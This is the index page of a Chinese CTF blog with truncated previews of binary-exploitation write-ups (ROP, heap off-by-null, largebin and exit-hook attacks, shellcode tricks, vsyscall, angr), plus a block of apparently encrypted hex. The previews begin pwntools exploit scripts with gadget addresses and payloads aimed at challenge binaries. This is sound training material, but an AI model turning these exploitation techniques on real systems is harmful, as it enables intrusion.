SkYe231 Blog

babyof1234567891011121314151617181920212223242526272829303132333435363738394041from pwn import*#r = remote("182.116.62.85",21613)r=process('./babyof')elf = ELF('./babyof')libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')context(log_level='debug',os='linux',arch='amd64')pop_rdi_ret = 0x0400743main_addr = 0x040066Bpop_rsi_r15_ret = 0x0400741payload = b'a'*0x40 + b'b'*8payload += p64(pop_rdi_ret)payload ...

angr 安装angr 需要使用到 z3、pyvex ，但使用的版本会与原本有去区别，所以推荐在 virtualenv 虚拟 python 环境中安装 angr 自定义 docker基于 debian 11 自定义制作的 docker 镜像，内含 aconda、jupyterlib、angr 123git clone --depth=1 [email protected]:skyedai910/anaconda_angr_docker.gitcd anaconda_angr_dockerdocker-compose up -d --build 端口映射：8888：8888 卷轴挂载：./volumes：/root angr ctf用于训练 angr 的题目仓库：https://github.com/jakespringer/angr_ctf 00_angr_find简单加密程序，找到校验成功的内存地址之后用 angr 找到路径即可，输入值就是明文 123456789101112131415161718192021222324252627282930#encoding:utf-8impo ...

chaos绕过逆向之后，进入菜单就是经典题目。堆块最后存 size 和下一个堆地址，size 可以被覆盖之后会导致任意长度读写 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182from pwn import *from pwn import p64,u64,p32,u32,p8context.arch = 'amd64'context.log_level = 'debug'#context.terminal = ['tmux','sp','-h']# elf = ELF('./chall')# libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')# ...

ez_book没有禁用 stderr ，会申请一个缓存堆块堆块，里面记录有全部的输入输出的信息，也就包含随机数。利用栈溢出，从 book name 那低地址覆盖 random num 地址爆破 EXP12345678910111213141516171819202122232425262728293031from pwn import *#context.log_level = 'debug'def res(name,pwd): p.sendlineafter(">\n",str(2)) p.sendlineafter(":",pwd) p.sendlineafter(":",name)#p = process("./main")def exp(): res("admin".ljust(0x10,'\x00')+'\x90\x74',"b") p.sendlineafter(">\n&q ...

Whats your nameoff by null 漏洞 会申请一个堆块来管理，里面会写一个函数和内容堆块地址，off by null 堆重叠之后控制这个结构体，实现任意地址读写 free hook 写入 setcontext 栈迁移到堆上 orw 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120from pwn import *context.log_level = 'debug'context.arch = 'amd64'context.os = 'linux'def ad ...

JigSaw’sCage开始菜单 make choice 输入有个整形溢出，将 v4 改得比 0xe 大，进入 else 分支 mprotect 给 heap 段加上 rwx 权限 test 运行 shellcode rdx 是堆地址，利用这个将 /bin/sh 地址传到 rdi ，然后 syscall getshell EXP12345678910111213141516171819202122232425262728293031323334353637383940414243444546from pwn import *context.log_level = 'debug'e = ELF("./JigSAW")context.binary = ep = process(['./JigSAW'])#p = remote("47.104.71.220",10273)def add(idx): p.sendlineafter('Choice : ','1') ...

https://www.anquanke.com/post/id/222948 适用场景 满足任一条件即可 测试最新 glibc 2.31 及以下都可以 程序能够显式的执行exit函数 程序通过libc_start_main启动的主函数，且主函数能够结束 原理分析 海师傅原文分析很详尽：https://www.anquanke.com/post/id/222948 补充一点，largebin attack 源码，glibc 对只有这部分没有新增补丁都能适用这个方法： 模板EXPexp 题目基本可以通用，特殊的就是 rtl_global 和伪造结构体的 payload 第二个写入值随 glibc 版本变化有所变化： 123456789 这个值 +----------------------+ | | payload = p64(0) + p64(libc_base + 0x221730) + p64(0) + ...

jumpy给出程序是个解释器，设计愿意只能写入： mov eax, xxx jmp xxx ret 对于 jmp 会用一个列表保存跳转的地址，运行 shellcode 之前会检查这些地址的汇编是不是限制的那三个。 漏洞地方在 mov eax, xxx 写入数值的时候没有检查数字，可以写入长度是 4 字节。搭配上 jmp 利用错位可以执行任意汇编。下面是错位例子： 123456789101112131415161718192021# 输入代码jmp 1; mov eax,0xb8; mov eax,0x90f63148# 错位 mov eax,xxxx +-----------+jmp 1 mov eax,0xb8| |+---+ +-----------+ || | | | |eb 01 b8 b8 00 00 00 b8 xx xx xx xx| ^| |+--- ...

vsyscall 介绍vsyscall 和 vdso 被设计用来加速系统调用的处理 vsyscall 的工作原则其实十分简单：Linux 内核在用户空间映射一个包含一些变量及一些系统调用的实现的内存页。 vsyscallt 特点： vsyscall页面在每个进程中是静态分配了相同的地址； 分配的内存较小； 只允许4个系统调用； vdso 特点： 提供和vsyscall相同的功能，同时解决了其局限。 vDSO是动态分配的，地址是随机的； 可以提供超过4个系统调用； vDSO是glibc库提供的功能； vsyscall 地址特性vsyscall分配的地址固定不变，不受 aslr 和 pie 影响，固定在： 1ffffffffff600000 - ffffffffffdfffff (=8 MB) vsyscalls 系统 aslr 打开，程序保护全开 vsyscall提供的系统调用导出 vsyscallGDB 运行程序，打断后导出内存数据： 1dump memory ./vsyscall 0xffffffffff600000 0xffffffffff601000 ...

a823c777a879d41ec09881931b08d975e5bd8443bc44689c2ca9c7a6f84f9fcbe5b675aef81d36f36f87f3803706ebdce153d76a1d7c8c018c83de82d330f9b95655f9f3d54dd07568a62dc9b62938f5e35d7caae7df37ed5af48b6e6b7b1a0e93f583e8ac905521c390e5a303a5c3b40b33c4e9848367dc464087dcd234d73312d33559790a9e849891940b3c50775d7e3eacdb12c7403358fe4e4da84a33293ba1f3c7e7647765632c1bddaafaff85cc03a1a99c879329ae09e9c871ab40607bdf4e5b719d959eaa2b8334f4929be7ef0b5da0deb1ad76b7316f75a1d67f1a08495d87c3a40c60603418241c3d46a9f5790f7b8324f31b0 ...